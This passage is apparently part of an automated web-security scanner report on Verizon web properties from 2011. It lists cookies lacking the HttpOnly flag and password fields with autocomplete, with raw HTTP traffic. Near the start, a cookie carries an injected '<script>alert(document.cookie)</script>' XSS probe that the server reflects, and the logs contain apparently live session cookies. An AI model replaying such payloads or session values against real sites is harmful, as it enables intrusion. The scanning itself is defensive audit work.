NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230544
Expires: Mon, 05 Sep 2011 22:39:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:39:57 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:39:57 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
<HEAD id="ctl00_head"><title>
Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type"
...[SNIP]...

10.137. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.138. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.139. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

EOrdering=AffinityCaptcha=NES6zYkqZVIXZHz3xATrXzO2Q%3d%3d&STEP133=NESJBAz%2b%2bFRFcSze8KcWPLg9w%3d%3d&PROJNORTH-CLIENT=; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.140. https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:47:02 GMT; path=/foryourhome/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.141. https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/VZRepair/vziha/Service.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; path=/; secure
vzinhomeagent=AccountIDAuthMode=bgBvAA==&GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADQAMAAxADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&IsFoundAck=ZgBhAGwAcwBlAA==&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A; path=/; secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/fiostv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 324213
Expires: Mon, 05 Sep 2011 22:24:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:39 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; path=/; secure
Set-Cookie: vzinhomeagent=AccountIDAuthMode=bgBvAA==&GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADQAMAAxADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&IsFoundAck=ZgBhAGwAcwBlAA==&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A; path=/; secure

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Verizon | Resi
...[SNIP]...

10.142. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.143. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/content/VerizonGlobalHome/validlogin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:24:46 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.144. https://www22.verizon.com/includes/cache/15/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/cache/15/blank.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:27:04 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.145. https://www22.verizon.com/includes/cache/getwb31.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/cache/getwb31.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:28:18 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.146. https://www22.verizon.com/includes/javascript/commonjs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/commonjs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.147. https://www22.verizon.com/includes/javascript/hbx.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx.js/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:42 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.148. https://www22.verizon.com/includes/javascript/hbx_custom.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx_custom.js/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.149. https://www22.verizon.com/includes/javascript/sitewise.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/sitewise.js/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:26:59 GMT; path=/includes/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.150. https://www22.verizon.com/vztracker/vzTracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/vztracker/vzTracker.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:29:19 GMT; path=/vztracker/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.151. http://www35.vzw.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.vzw.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM570203L6VDV6=V1rrrrr"rz%X%QBeri^@Brrr@rz%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@r"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6XXzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
WSS_GW=V1z%X%QBeri^@; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
DM5612035ADDV6=V1rrrrr"rz%X%QBeri^@Brrr@%z%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@%"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)O:ma6r"OuKr6^QzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
CTG=1315260897; path=/; domain=www35.vzw.com; expires=Mon, 12-Sep-2011 22:14:57 GMT; max-age=604800
DM5701316PRAV6=V1rrrrr"rz%X%QBeri^@Brrr@%z%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@%"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6^QzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM570203L6VD%3BDM5612035ADD%3BDM5701316PRA&cd=1&hv=6&n=/personal&con=&vcon=/recipeb/vzw/home+page&tt=auto&ja=y&dt=22&zo=300&lm=1315278870000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&cv.c34=tWRJzfV2FzyamDVoURNGmO7smtgitROzrsjFa48jF8jyYMlJxx5Bllp8fvpJxcQO4&rf=aaaa%3Dbbbb%22%3Ess%26ccc%3Ddddd%2611111%3D22222&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=&lv.pos=&hid=0.001893016047052276 HTTP/1.1
Host: www35.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:14:57 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM570203L6VDV6=V1rrrrr"rz%X%QBeri^@Brrr@rz%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@r"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6XXzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeri^@; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
Set-Cookie: DM5612035ADDV6=V1rrrrr"rz%X%QBeri^@Brrr@%z%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@%"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)O:ma6r"OuKr6^QzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
Set-Cookie: CTG=1315260897; path=/; domain=www35.vzw.com; expires=Mon, 12-Sep-2011 22:14:57 GMT; max-age=604800
Set-Cookie: DM5701316PRAV6=V1rrrrr"rz%X%QBeri^@Brrr@%z%zrzr"%X%QBeri^@z%X%QBeri^@"%X%QBeri^@"%X%QBeri^@Brrr@%"rz(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6^QzA6hac2Gau6qUk6O:maHGIWa6GahF:TI~zIIIIxX[uuuuxBBxX(FFxBecccxX[____xBe%%%%%xX[BBBBB; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:14:57 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:14:58 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.152. http://www35.vzw.com/HGct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.vzw.com
Path:	/HGct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM570203L6VDV6=V1rrrrr"rz%X%QBer^rr%QrBBCz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBC"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6Q%zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
WSS_GW=V1z%X%QBer^rr; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
DM5612035ADDV6=V1rrrrr"rz%X%QBer^rr%QrBBQz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBQ"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)O:ma6r"OuKr6%r^zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
CTG=1315260901; path=/; domain=www35.vzw.com; expires=Mon, 12-Sep-2011 22:15:01 GMT; max-age=604800
DM5701316PRAV6=V1rrrrr"rz%X%QBer^rr%QrBBQz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBQ"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6%r^zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM570203L6VD%3BDM5612035ADD%3BDM5701316PRA&cd=1&hv=6&n=/personal&con=&vcon=/recipeb/vzw/home+page&tt=auto&ja=y&dt=22&zo=300&lm=1315278870000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=2&lid=//hp//p//100+Trade+In//Imp&hid=0.8519863505392464 HTTP/1.1
Host: www35.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA; CTG=1315260897

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:01 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM570203L6VDV6=V1rrrrr"rz%X%QBer^rr%QrBBCz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBC"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6Q%zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBer^rr; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
Set-Cookie: DM5612035ADDV6=V1rrrrr"rz%X%QBer^rr%QrBBQz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBQ"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)O:ma6r"OuKr6%r^zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
Set-Cookie: CTG=1315260901; path=/; domain=www35.vzw.com; expires=Mon, 12-Sep-2011 22:15:01 GMT; max-age=604800
Set-Cookie: DM5701316PRAV6=V1rrrrr"rz%X%QBer^rr%QrBBQz%zrz%"%X%QBer^rrz%X%QBer^rr"%X%QBer^r%"%X%QBer^rr%QrBBQ"%z(xB$hac2GauxB$qUkxB$O:maxBrGIWaxB$GahF:TI~z7}z)OuKr6%r^zA6hac2Gau6qUk6O:maHGIWa6GahF:TI~; path=/; domain=www35.vzw.com; expires=Tue, 04-Sep-2012 22:15:01 GMT; max-age=31536000
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:15:02 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

11. Password field with autocomplete enabled previous next
There are 18 instances of this issue:

http://b2b.vzw.com/industrysolutions/index.html
https://dashboard.opinionlab.com/pv_controlboard.html
https://enterprisecenter.verizon.com/enterprisesolutions/default/CC/signIn.do
https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do
https://signin.verizon.com/sso/RetrieveUserID
http://webmail.verizon.com/signin/
http://webmail.verizon.net/signin/
http://webmail.verizon.net/signin/Login.jsp
http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver
http://www.connecttoverizon.com/
http://www.connecttoverizon.com/loginFailed.html
http://www.connecttoverizon.com/loginFailed.html
http://www.connecttoverizon.com/order-now.html
http://www.facebook.com/connect/prompt_feed.php
http://www.facebook.com/dialog/feed
https://www.google.com/accounts/ServiceLogin
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Issue background

